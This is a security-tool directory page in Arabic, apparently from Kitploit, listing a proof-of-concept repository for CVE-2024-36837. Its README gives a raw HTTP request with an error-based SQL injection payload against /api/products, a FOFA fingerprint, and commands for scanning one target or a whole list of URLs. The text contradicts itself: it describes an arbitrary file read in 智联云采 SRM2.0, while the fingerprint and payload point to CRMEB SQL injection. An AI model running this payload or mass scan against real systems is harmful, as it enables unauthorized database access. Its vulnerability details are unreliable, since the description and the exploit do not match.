Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36837 — CVE-2024-36837 POC | Kitploit
أدوات/GitHubGitHub/lhc321-source/cve-2024-36837
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 POC

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

README.md

#CVE-2024-36837

إخلاء المسؤولية

#توجد ثغرة قراءة ملفات تعسفية (Arbitrary File Read) في واجهة runtimeLog/download في نظام 智联云采 SRM2.0، ويمكن للمهاجم غير المصادق عليه استغلال هذه الثغرة لقراءة ملفات مهمة في النظام (مثل ملفات إعداد قاعدة البيانات وملفات إعداد النظام) وغيرها، مما يجعل الموقع في حالة غير آمنة للغاية.

صيغة fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #أضف http:// أو https:// قبل عنوان url python 11.py

#طريقة الاستخدام python cve.py -h

#الفحص الجماعي يجب أن يبدأ عنوان url في ملف url.txt بـ http:// أو https:// python cve.py -f url.txt

#الفحص الفردي يجب أن يبدأ عنوان url بـ http:// أو https:// python cve.py -u url

تنزيل الأداة